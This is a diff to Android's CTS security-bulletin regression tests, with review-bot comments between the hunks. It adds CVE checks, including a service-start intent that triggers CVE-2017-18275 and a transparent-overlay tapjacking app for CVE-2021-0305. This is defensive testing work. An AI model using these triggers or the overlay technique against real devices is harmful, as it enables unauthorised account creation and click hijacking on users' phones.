- */ - public synchronized void start() throws Exception { - long totalMemory = getMemTotal(getDevice()); - isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB; - - // reset test oom behavior - // Devices should fail tests that OOM so that they'll be ran again with --retry. - // If the test OOMs because previous tests used the memory, it will likely pass - // on a second try. - oomBehavior = OomBehavior.FAIL_AND_LOG; - oomDetected = false; - - // Cache OOM detection in separate persistent threads for each device. - WeakReference<BackgroundDeviceAction> reference = - oomCatchers.get(getDevice().getSerialNumber()); - BackgroundDeviceAction oomCatcher = null; - if (reference != null) { - oomCatcher = reference.get(); - } - if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) { - AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice()); - - oomCatcher = new BackgroundDeviceAction( - "logcat -c && logcat OomCatcher:V *:S", - "Oom Catcher background thread", - getDevice(), new OomReceiver(getDevice()), 0); - - oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher)); - oomCatcher.start(); - } - } - - /** - * Stop the hostside oom catcher thread. - * Match this call to SecurityTestCase.setup(). - */ - public static void stop(String serial) { - WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial); - if (reference != null) { - BackgroundDeviceAction oomCatcher = reference.get(); - if (oomCatcher != null) { - oomCatcher.cancel(); - } - } - } - - /** - * Check every test teardown to see if the device oomed during the test. - */ - public synchronized boolean isOomDetected() { - return oomDetected; - } - - /** - * Return the current test behavior for when oom is detected. - */ - public synchronized OomBehavior getOomBehavior() { - return oomBehavior; - } - - /** - * Flag meaning the test will likely fail on devices with low memory. 
- */ - public synchronized void setHighMemoryTest() { - if (isLowMemoryDevice) { - oomBehavior = OomBehavior.PASS_AND_LOG; - } else { - oomBehavior = OomBehavior.FAIL_AND_LOG; - } - } - - /** - * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability - * intentionally OOMs the device. - */ - public synchronized void setOomTest() { - oomBehavior = OomBehavior.FAIL_NO_LOG; - } - - private ITestDevice getDevice() { - return context.getDevice(); - } - - /** - * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot - * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive. - */ - class OomReceiver extends MultiLineReceiver { - - private ITestDevice device = null; - private boolean isCancelled = false; - - public OomReceiver(ITestDevice device) { - this.device = device; - } - - @Override - public void processNewLines(String[] lines) { - for (String line : lines) { - if (Pattern.matches(".*Low memory.*", line)) { - // low memory detected, reboot device to clear memory and pass test - isCancelled = true; - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, - "lowmemorykiller detected; rebooting device."); - synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected - oomDetected = true; // set HostSideOomCatcher var - } - try { - device.nonBlockingReboot(); - device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes - } catch (Exception e) { - Log.e(LOG_TAG, e.toString()); - } - return; // we don't need to process remaining lines in the array - } - } - } - - @Override - public boolean isCancelled() { - return isCancelled; - } - } -} - diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java index 39b7ada09f6..0895607d122 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java 
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java @@ -44,7 +44,6 @@ public class Poc16_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2016-05") public void testPocCVE_2015_1805() throws Exception { - getOomCatcher().setHighMemoryTest(); AdbUtils.runPoc("CVE-2015-1805", getDevice(), TIMEOUT_NONDETERMINISTIC); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java index 4367a61a149..835c1cf51f3 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java @@ -58,7 +58,6 @@ public class Poc16_07 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2016-07") public void testPocCVE_2016_3747() throws Exception { - getOomCatcher().setHighMemoryTest(); AdbUtils.runPocAssertNoCrashes("CVE-2016-3747", getDevice(), "mediaserver"); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java index 44b0d892484..dc41d7c201f 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java @@ -33,7 +33,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13286() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice()); } @@ -44,7 +43,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13288() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice()); } 
@@ -55,7 +53,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13289() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java index 6b51f0a6b11..e3128f1212e 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java @@ -33,7 +33,6 @@ public class Poc18_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-05") public void testPocCVE_2017_13315() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice()); } @@ -44,7 +43,6 @@ public class Poc18_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-05") public void testPocCVE_2017_13312() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java index 172f0fc300c..64929d9fc24 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java 
@@ -35,4 +35,26 @@ public class Poc18_07 extends SecurityTestCase { AdbUtils.runPocAssertNoCrashes( "CVE-2018-9424", getDevice(), "android\\.hardware\\.drm@\\d\\.\\d-service"); } + + /* + * CVE-2017-18275 + */ + @Test + @SecurityTest(minPatchLevel = "2018-07") + public void testPocCVE_2017_18275() throws Exception { + String command = + "am startservice " + + "-n com.qualcomm.simcontacts/com.qualcomm.simcontacts.SimAuthenticateService " + + "-a android.accounts.AccountAuthenticator -e account_name cve_2017_18275"; + String result = AdbUtils.runCommandLine( + "pm list packages | grep com.qualcomm.simcontacts", getDevice()); + if (result.contains("com.qualcomm.simcontacts")) { + AdbUtils.runCommandLine("logcat -c", getDevice()); + AdbUtils.runCommandLine(command, getDevice()); + String logcat = AdbUtils.runCommandLine("logcat -d", getDevice()); + assertNotMatchesMultiLine( + "Authenticator: Add SIM account.*ContactsProvider: Accounts changed", + logcat); + } + } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java new file mode 100644 index 00000000000..9c60f67b871 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java 
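Review bot: `testPocCVE_2017_18275` reports a pass when `com.qualcomm.simcontacts` is not installed, because the whole check sits inside `if (result.contains("com.qualcomm.simcontacts"))`; the result then reads as "verified not vulnerable" although nothing was exercised. An assumption makes the run show up as skipped instead: `assumeTrue(result.contains("com.qualcomm.simcontacts"));` followed by the body without the `if` (the file's imports are outside this hunk, so `org.junit.Assume.assumeTrue` may need importing). Separately, `logcat -d` is read immediately after `am startservice` returns, so the two log lines the regex looks for may not have been written yet and an affected build could pass; a short bounded wait or poll before the dump would close that gap. The class body continues outside the hunk.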
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class Poc19_04 extends SecurityTestCase {
+
+ /**
+ * CVE-2018-13895
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testPocCVE_2018_13895() throws Exception {
+ String result = AdbUtils.runCommandLine(
+ "pm list package com.suntek.mway.rcs.app.service",getDevice());
+ assertFalse(result.contains("com.suntek.mway.rcs.app.service"));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
index fe8c239ad95..07f45db0d4e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
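Review bot: The `assertFalse` in `testPocCVE_2018_13895` carries no message, so a failure gives no hint that the installed package is what failed. `assertFalse("com.suntek.mway.rcs.app.service is installed", result.contains("com.suntek.mway.rcs.app.service"));` would make the report readable. The Javadoc holds only the CVE id; one sentence stating that the test treats the mere presence of this package as the failing condition would explain why nothing is executed on the device. `result.contains` is a substring match, so an installed package whose name only begins with that string also fails the test; if the exact package is meant, compare each output line with `package:com.suntek.mway.rcs.app.service`.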
@@ -133,8 +133,8 @@ public class PocPusher extends TestWatcher { } testFile += bitness; } - File localFile = buildHelper.getTestFile(testFile); CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile); + File localFile = buildHelper.getTestFile(testFile); device.pushFile(localFile, remoteFile); if (cleanup) { filesToCleanup.add(remoteFile); diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java index 10137a0ae46..5dc459059d9 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java @@ -58,7 +58,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { private long kernelStartTime; - private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this); private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this); @Rule public TestName testName = new TestName(); @@ -80,7 +79,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { // TODO:(badash@): Watch for other things to track. // Specifically time when app framework starts - oomCatcher.start(); sBuildInfo.put(getDevice(), getBuild()); sAbi.put(getDevice(), getAbi()); sTestName.put(getDevice(), testName.getMethodName()); @@ -95,8 +93,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { */ @After public void tearDown() throws Exception { - oomCatcher.stop(getDevice().getSerialNumber()); - try { getDevice().waitForDeviceAvailable(90 * 1000); } catch (DeviceNotAvailableException e) { 
@@ -105,27 +101,11 @@ public class SecurityTestCase extends BaseHostJUnit4Test { getDevice().waitForDeviceAvailable(30 * 1000); } - if (oomCatcher.isOomDetected()) { - // we don't need to check kernel start time if we intentionally rebooted because oom - updateKernelStartTime(); - switch (oomCatcher.getOomBehavior()) { - case FAIL_AND_LOG: - fail("The device ran out of memory."); - break; - case PASS_AND_LOG: - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test."); - break; - case FAIL_NO_LOG: - fail(); - break; - } - } else { - long deviceTime = getDeviceUptime() + kernelStartTime; - long hostTime = System.currentTimeMillis() / 1000; - assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2); + long deviceTime = getDeviceUptime() + kernelStartTime; + long hostTime = System.currentTimeMillis() / 1000; + assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2); - // TODO(badash@): add ability to catch runtime restart - } + // TODO(badash@): add ability to catch runtime restart } public static IBuildInfo getBuildInfo(ITestDevice device) { 
@@ -231,7 +211,22 @@ public class SecurityTestCase extends BaseHostJUnit4Test { * Check if a driver is present on a machine. */ protected boolean containsDriver(ITestDevice device, String driver) throws Exception { - boolean containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0; + boolean containsDriver = false; + if (driver.contains("*")) { + // -A list all files but . and .. + // -d directory, not contents + // -1 list one file per line + // -f unsorted + String ls = "ls -A -d -1 -f " + driver; + if (AdbUtils.runCommandGetExitCode(ls, device) == 0) { + String[] expanded = device.executeShellCommand(ls).split("\\R"); + for (String expandedDriver : expanded) { + containsDriver |= containsDriver(device, expandedDriver); + } + } + } else { + containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0; + } MetricsReportLog reportLog = buildMetricsReportLog(getDevice()); reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE); @@ -293,10 +288,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { kernelStartTime = (System.currentTimeMillis() / 1000) - uptime; } - public HostsideOomCatcher getOomCatcher() { - return oomCatcher; - } - /** * Return true if a module is play managed. * diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java index 987e3e3ee12..c596244b5ad 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java @@ -111,6 +111,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-11") @Test public void testPocCVE_2020_0450() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0450", null, getDevice()); } 
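Review bot: In the new wildcard branch of `containsDriver`, the `ls` command runs twice, once through `AdbUtils.runCommandGetExitCode` for the status and again through `device.executeShellCommand` for the output, so the listing that gets parsed is not the one whose exit code was checked. Each expanded name is then fed back into `containsDriver` and concatenated unquoted into `test -r`, so an empty entry or a path with whitespace is not tested as the path it names; with an empty operand `test -r` is likely to treat the lone `-r` as a non-empty string and succeed. Skipping blanks with `if (expandedDriver.isEmpty()) continue;` and quoting the operand of `test -r` would make a reported "driver present" trustworthy. The recursive call also runs the metrics reporting that follows in the function body, which continues outside the hunk, once per expanded path.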
@@ -166,6 +167,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2133() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2133", null, getDevice()); } @@ -176,6 +178,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2134() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2134", null, getDevice()); } @@ -528,7 +531,11 @@ public class TestMedia extends SecurityTestCase { String binaryName = "CVE-2018-9537"; String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); - testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + // example of check crash to skip: + // Abort message: 'frameworks/av/media/extractors/mkv/MatroskaExtractor.cpp:548 CHECK(mCluster) failed.' + testConfig.config = new CrashUtils.Config() + .setProcessPatterns(binaryName) + .appendAbortMessageExcludes("CHECK\\(.*?\\)"); testConfig.config.setSignals(signals); AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); } diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp new file mode 100644 index 00000000000..70015337024 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp 
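Review bot: The exclude pattern `CHECK\\(.*?\\)` passed to `appendAbortMessageExcludes` in the CVE-2018-9537 test matches any abort message containing a `CHECK(...)` expression, not only the `MatroskaExtractor.cpp` check quoted in the comment. With `CrashUtils.SIGABRT` in the signal list, an abort from a different failed CHECK in the same process would presumably be ignored as well. Anchoring the pattern to what the comment shows keeps the exclusion as narrow as the comment describes, for example `.appendAbortMessageExcludes("MatroskaExtractor\\.cpp:\\d+ CHECK\\(mCluster\\)")`. The enclosing test method starts outside the hunk.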
@@ -0,0 +1,31 @@
+// Copyright (C) 2021 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+android_test_helper_app {
+ name: "CVE-2021-0305",
+ defaults: ["cts_support_defaults"],
+ srcs: ["src/**/*.java"],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "androidx.test.core",
+ ],
+ sdk_version: "current",
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
new file mode 100644
index 00000000000..07131a62ac4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
@@ -0,0 +1,51 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_0305"
+ android:targetSandboxVersion="2">
+
+ <uses-permission android:name="android.permission.CAMERA" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+
+ <application>
+ <uses-library android:name="android.test.runner" />
+ <activity
+ android:name=".MainActivity"
+ android:label="ST (Permission)"
+ android:taskAffinity="android.security.cts.CVE_2021_0305.MainActivity"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity
+ android:name=".OverlayActivity"
+ android:theme="@style/OverlayTheme"
+ android:exported="true"/>
+
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0305" />
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
new file mode 100644
index 00000000000..20a9812c5dc
--- /dev/null
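Review bot: The manifest requests `android.permission.CAMERA` and `android.permission.RECORD_AUDIO`, but nothing in the sources added for this test app in the same commit (`MainActivity`, `OverlayActivity`, `DeviceTest`) requests or uses either permission. If they are left over from the original proof of concept, the two `<uses-permission>` lines can be dropped so the helper app holds no more than it needs. If the test does depend on them, an XML comment above the two lines should say which step relies on them. The `xmlns:tools` declaration is also unused in this file.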
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml @@ -0,0 +1,24 @@ +<?xml version="1.0" encoding="utf-8"?> +<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" + android:orientation="vertical" + android:layout_width="match_parent" + android:layout_height="match_parent" + xmlns:tools="http://schemas.android.com/tools" + xmlns:app="http://schemas.android.com/apk/res-auto" + tools:context=".MainActivity"> + + <TextView + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:text="@string/sample_text" + /> + + <Button + android:id="@+id/testButton1" + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:text="@string/test_button_label" + android:layout_centerInParent="true" + android:gravity="end|center_vertical" + /> +</LinearLayout> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml new file mode 100644 index 00000000000..815602c6edf --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml 
@@ -0,0 +1,28 @@ +<resources> + + <attr name="colorOverlay" format="color" /> + <attr name="colorDialog" format="color" /> + <attr name="projectAlpha" format="float" /> + + <!-- Switch between the two to see what's happening behind the attacks --> + <style name="AppTheme" parent="SeeBehind"/> + <!--<style name="AppTheme" parent="AppThemeBase.SeeBehind"/>--> + + <style name="SeeBehind"> + <item name="colorOverlay">#BB4BEFD7</item> + <item name="colorDialog">#88FFFFFF</item> + <item name="projectAlpha">0.0</item> + </style> + + <color name="colorM">#5600D1</color> + + <style name="OverlayTheme" parent="AppTheme"> + <!--<item name="android:windowBackground">@color/colorM</item>--> + <item name="android:windowBackground">@android:color/transparent</item> + <item name="android:windowAnimationStyle">@null</item> + <item name="android:windowIsTranslucent">true</item> + </style> + + + +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml new file mode 100644 index 00000000000..ab8b450c5fb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml @@ -0,0 +1,5 @@ +<resources> + <string name="app_name">CVE_2021_0305</string> + <string name="test_button_label">Test Button</string> + <string name="sample_text">text in activity</string> +</resources>
\ No newline at end of file diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java new file mode 100644 index 00000000000..5634f4f55bb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java 
@@ -0,0 +1,142 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0305; + +import org.junit.Before; +import org.junit.After; +import org.junit.Test; +import org.junit.runner.RunWith; + +import android.content.Context; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.content.pm.ResolveInfo; +import android.os.SystemClock; +import android.util.Log; + +import static androidx.test.core.app.ApplicationProvider.getApplicationContext; +import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation; +import androidx.test.filters.SdkSuppress; +import androidx.test.runner.AndroidJUnit4; +import androidx.test.uiautomator.By; +import androidx.test.uiautomator.UiDevice; +import androidx.test.uiautomator.UiObject2; +import androidx.test.uiautomator.Until; +import androidx.test.uiautomator.BySelector; + +import static org.hamcrest.CoreMatchers.equalTo; +import static org.hamcrest.CoreMatchers.is; +import static org.hamcrest.CoreMatchers.notNullValue; +import static org.junit.Assert.assertThat; +import static org.junit.Assert.assertFalse; + +/** + * Basic sample for unbundled UiAutomator. 
+ */ +@RunWith(AndroidJUnit4.class) +public class DeviceTest { + + private static final String BASIC_SAMPLE_PACKAGE + = "android.security.cts.CVE_2021_0305"; + private static final int LAUNCH_TIMEOUT_MS = 20000; + private static final String STRING_TO_BE_TYPED = "UiAutomator"; + + private UiDevice mDevice; + + @Before + public void startMainActivityFromHomeScreen() { + + Log.d("CVE", "startMainActivityFromHomeScreen()"); + + // Initialize UiDevice instance + mDevice = UiDevice.getInstance(getInstrumentation()); + + // Start from the home screen + mDevice.pressHome(); + + // Launch the blueprint app + Context context = getApplicationContext(); + assertThat(context, notNullValue()); + PackageManager packageManager = context.getPackageManager(); + assertThat(packageManager, notNullValue()); + final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE); + assertThat(intent, notNullValue()); + + intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); // Clear out any previous instances + context.startActivity(intent); + + // Wait for the app to appear + Log.d("CVE", "wait for the app to appear"); + mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS); + Log.d("CVE", "app appeared"); + } + + @After + public void lastOperation(){ + Log.d("CVE", "lastOperation() wait 20s"); + SystemClock.sleep(20000); + Log.d("CVE", "lastOperation() completed"); + } + + @Test + public void testClick() { + Log.d("CVE", "testClick()"); + boolean clicked = false; + java.util.List<UiObject2> objects; + BySelector selector = By.clickable(true); + String button; + + //Detect "Test Button". + //"Test Button" appears after onResume(). + //mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS); + //waits for onEnterAnimationComplete() to finish. + //So we have LAUNCH_TIMEOUT_MS for the button to appear. + //If the button it still not available then + //we assume the button is obscured and the test passes. 
+ Log.d("CVE", "looking for clickable"); + objects = mDevice.findObjects(selector); + for (UiObject2 o : objects) { + button = o.getText(); + Log.d("CVE", "button:" + button); + + if(button==null){ + //check the next button + continue; + } + + switch(button){ + case "Test Button" : + o.click(); + clicked=true; + Log.i("CVE", "clicked: Test Button"); + break; + default : + //check the next button + continue; + } + + //A button this test is looking for just got pressed. + //Ignore remaining buttons + break; + } + + Log.d("CVE", "testClick() end"); + assertFalse(clicked); + Log.d("CVE", "testClick() passed"); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java new file mode 100644 index 00000000000..50a16228d3e --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java 
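Review bot: `testClick` passes whenever no clickable object labelled "Test Button" is found, and the `@Before` method ignores the value returned by `mDevice.wait(...)`, so a launch that timed out looks the same as an overlay that correctly blocked the button. Asserting the wait result would turn a failed launch into a failure instead of a pass: `assertThat(mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS), is(true));`. The unconditional `SystemClock.sleep(20000)` in `lastOperation()` has no stated reason and adds 20 seconds to every test, so it needs either a why-comment or removal. The class Javadoc ("Basic sample for unbundled UiAutomator") and the unused `STRING_TO_BE_TYPED` look like leftovers from a sample project.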
@@ -0,0 +1,64 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0305; + +import android.app.Activity; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.Manifest.permission; +import android.os.Bundle; +import android.os.Handler; +import android.view.View; +import android.widget.EditText; +import android.widget.TextView; +import android.util.Log; +import android.widget.Button; +import android.os.SystemClock; +import static android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION; + + +public class MainActivity extends Activity { + + private static final int REQUEST_CAMERA_PERMISSION = 0; + Button testButton1; + + @Override + public void onCreate(Bundle b) { + super.onCreate(b); + Log.e("CVE", "onCreate"); + setContentView(R.layout.activity_main); + testButton1 = (Button) findViewById(R.id.testButton1);//get id of button + + testButton1.setOnClickListener(new View.OnClickListener() { + @Override + public void onClick(View view) { + Log.d("CVE", "button click received"); + } + }); + } + + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + Log.d("CVE", "MainActivity.onEnterAnimationComplete()"); + + //open OverlayActivity to obstruct MainActivity + Intent intent = new Intent(this, OverlayActivity.class); + intent.setFlags(FLAG_ACTIVITY_NO_ANIMATION); + startActivity(intent); + } +} 
